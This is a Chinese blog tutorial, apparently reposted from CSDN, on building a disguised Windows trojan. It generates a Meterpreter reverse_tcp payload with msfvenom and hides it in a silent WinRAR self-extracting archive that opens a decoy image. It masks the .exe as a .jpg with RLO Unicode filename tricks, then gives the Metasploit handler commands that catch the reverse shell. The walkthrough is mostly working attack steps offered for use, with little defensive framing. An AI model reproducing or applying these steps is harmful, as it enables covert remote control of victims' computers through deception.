kali-WinRaR高级配置

发布时间:2023年12月19日

操作环境

kali
windows

一、下载WinRaR

http://www.winrar.com.cn/

二、准备工作

msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.64.129 LPORT=4444 -f exe -o YouGuess.exe
┌──(root?kali)-[~]
└─# msfvenom  -p windows/meterpreter/reverse_tcp  LHOST=192.168.64.129 LPORT=4444 -f exe -o YouGuess.exe
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 354 bytes
Final size of exe file: 73802 bytes
Saved as: YouGuess.exe

#下载生成文件到本地
┌──(root?kali)-[~]
└─# sz YouGuess.exe

AI生成一张图片,扣图为透明图像。 http://www.ico51.cn/

在这里插入图片描述

选中YouGuess.jpg图像和YouGuess.exe,右键,使用WinRaR,添加到压缩文件

在这里插入图片描述

  1. 常规中勾选创建自解压格式压缩文件

  2. 高级中点击自解压选项,常规中选择解压路径,填写

    C:\Windows\Temp

    自动选择绝对路径;设置中解压后运行,填写

    C:\Windows\Temp\YouGuess.jpg

    C:\Windows\Temp\YouGuess.jpg

  3. 模式中选择全部隐藏

  4. 更新中选择解压并更新文件,跳过已经存在的文件

  5. 文本和图标中选择从文件加载自解压文件图标

在这里插入图片描述

效果图

在这里插入图片描述

三、文件名处理

改个名吧,选中文件名进行重命名,重命名框出现后,鼠标右键插入 Unicode 控制字符 RLO

RLO 从右到左

LRO 从左到右

输入gpj结果是什么呢

在这里插入图片描述

再次重命名,这次插入LRO

在这里插入图片描述

回到Kali开启监听一下

┌──(root?kali)-[/home/kali/output]
└─# msfdb run
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 192.168.64.129
msf6 exploit(multi/handler) > set lport 4444 
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.64.129:4444 

OK,打开一下这个文件

在这里插入图片描述

四、开始监听

确实打开了图片,并且解压到了Temp目录下,Kali也监听到了目标机

在这里插入图片描述

文章来源:https://blog.csdn.net/qq_18931093/article/details/135093874
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。